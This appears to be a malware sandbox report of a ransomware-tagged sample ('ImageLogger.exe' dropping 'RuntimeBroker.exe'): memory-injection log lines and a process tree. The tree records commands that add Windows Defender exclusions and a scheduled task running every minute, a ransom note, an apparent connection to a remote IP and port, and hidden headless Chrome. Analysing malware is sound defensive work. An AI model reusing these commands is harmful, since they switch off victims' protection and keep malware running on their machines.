PID 3852 wrote to memory of 852 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3852 wrote to memory of 852 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3852 wrote to memory of 852 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3852 wrote to memory of 852 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3852 wrote to memory of 852 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3852 wrote to memory of 852 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3852 wrote to memory of 852 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3852 wrote to memory of 852 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3852 wrote to memory of 852 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3852 wrote to memory of 852 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3852 wrote to memory of 852 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3852 wrote to memory of 852 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3852 wrote to memory of 852 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3852 wrote to memory of 852 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3852 wrote to memory of 852 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3852 wrote to memory of 852 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3852 wrote to memory of 852 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3852 wrote to memory of 852 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3852 wrote to memory of 852 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3852 wrote to memory of 852 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3852 wrote to memory of 852 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3852 wrote to memory of 852 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3852 wrote to memory of 852 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3852 wrote to memory of 852 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3852 wrote to memory of 852 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3852 wrote to memory of 852 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3852 wrote to memory of 852 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3852 wrote to memory of 852 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3852 wrote to memory of 852 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3852 wrote to memory of 852 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3852 wrote to memory of 852 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3852 wrote to memory of 852 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3852 wrote to memory of 912 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3852 wrote to memory of 912 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3852 wrote to memory of 4884 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3852 wrote to memory of 4884 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3852 wrote to memory of 4884 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3852 wrote to memory of 4884 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3852 wrote to memory of 4884 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3852 wrote to memory of 4884 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3852 wrote to memory of 4884 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3852 wrote to memory of 4884 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe

"C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'ImageLogger.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'RuntimeBroker.exe'

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "RuntimeBroker" /tr "C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Desktop\How To Decrypt My Files.html

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd096646f8,0x7ffd09664708,0x7ffd09664718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,12493411454449047505,789863895145461872,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2176 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2168,12493411454449047505,789863895145461872,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2244 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2168,12493411454449047505,789863895145461872,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2956 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,12493411454449047505,789863895145461872,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,12493411454449047505,789863895145461872,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2168,12493411454449047505,789863895145461872,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5216 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2168,12493411454449047505,789863895145461872,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5216 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,12493411454449047505,789863895145461872,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4756 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,12493411454449047505,789863895145461872,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4712 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,12493411454449047505,789863895145461872,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,12493411454449047505,789863895145461872,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5612 /prefetch:1

C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe

C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Desktop\How To Decrypt My Files.html

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x128,0x12c,0x130,0x40,0x134,0x7ffd096646f8,0x7ffd09664708,0x7ffd09664718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,5618581219131323525,8541631778197707328,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2168 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2128,5618581219131323525,8541631778197707328,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2392 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2128,5618581219131323525,8541631778197707328,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2932 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,5618581219131323525,8541631778197707328,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,5618581219131323525,8541631778197707328,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffd0762ab58,0x7ffd0762ab68,0x7ffd0762ab78

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1712 --field-trial-handle=2044,i,6804115783360067307,10971470147706887476,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1824 --field-trial-handle=2044,i,6804115783360067307,10971470147706887476,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2176 --field-trial-handle=2044,i,6804115783360067307,10971470147706887476,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2952 --field-trial-handle=2044,i,6804115783360067307,10971470147706887476,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2960 --field-trial-handle=2044,i,6804115783360067307,10971470147706887476,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4408 --field-trial-handle=2044,i,6804115783360067307,10971470147706887476,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4588 --field-trial-handle=2044,i,6804115783360067307,10971470147706887476,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4720 --field-trial-handle=2044,i,6804115783360067307,10971470147706887476,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4980 --field-trial-handle=2044,i,6804115783360067307,10971470147706887476,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5116 --field-trial-handle=2044,i,6804115783360067307,10971470147706887476,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5108 --field-trial-handle=2044,i,6804115783360067307,10971470147706887476,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe

"C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe" --reenable-autoupdates --system-level

C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe

"C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x254,0x258,0x25c,0x230,0x260,0x7ff638c5ae48,0x7ff638c5ae58,0x7ff638c5ae68

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4692 --field-trial-handle=2044,i,6804115783360067307,10971470147706887476,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=4416 --field-trial-handle=2044,i,6804115783360067307,10971470147706887476,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=3372 --field-trial-handle=2044,i,6804115783360067307,10971470147706887476,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=4744 --field-trial-handle=2044,i,6804115783360067307,10971470147706887476,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=3512 --field-trial-handle=2044,i,6804115783360067307,10971470147706887476,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5416 --field-trial-handle=2044,i,6804115783360067307,10971470147706887476,131072 /prefetch:8

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x3cc 0x2ec

C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe

C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k SDRSVC

C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe

C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5776 --field-trial-handle=2044,i,6804115783360067307,10971470147706887476,131072 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\kjxtjz.exe

"C:\Users\Admin\AppData\Local\Temp\kjxtjz.exe"

C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe

C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe

C:\Users\Admin\AppData\Local\Temp\wszaxi.exe

"C:\Users\Admin\AppData\Local\Temp\wszaxi.exe"

C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe

C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe

C:\Program Files\VideoLAN\VLC\vlc.exe

"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\AppData\Local\Temp\jlkern.mp3"

C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe

C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" 193.161.193.99 39917 <123456789> FADB3748ACBB914CAD69

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -c explorer shell:::{3080F90E-D7AD-11D9-BD98-0000947B0257}

C:\Windows\SysWOW64\explorer.exe

"C:\Windows\system32\explorer.exe" shell::: -encodedCommand MwAwADgAMABGADkAMABFAC0ARAA3AEEARAAtADEAMQBEADkALQBCAEQAOQA4AC0AMAAwADAAMAA5ADQANwBCADAAMgA1ADcA -inputFormat xml -outputFormat text

C:\Windows\explorer.exe

C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {3eef301f-b596-4c0b-bd92-013beafce793} -Embedding

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --mute-audio --disable-audio --disable-3d-apis --disable-gpu --disable-d3d11 "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffd0762ab58,0x7ffd0762ab68,0x7ffd0762ab78

C:\Program Files\Google\Chrome\Application\chrome.exe

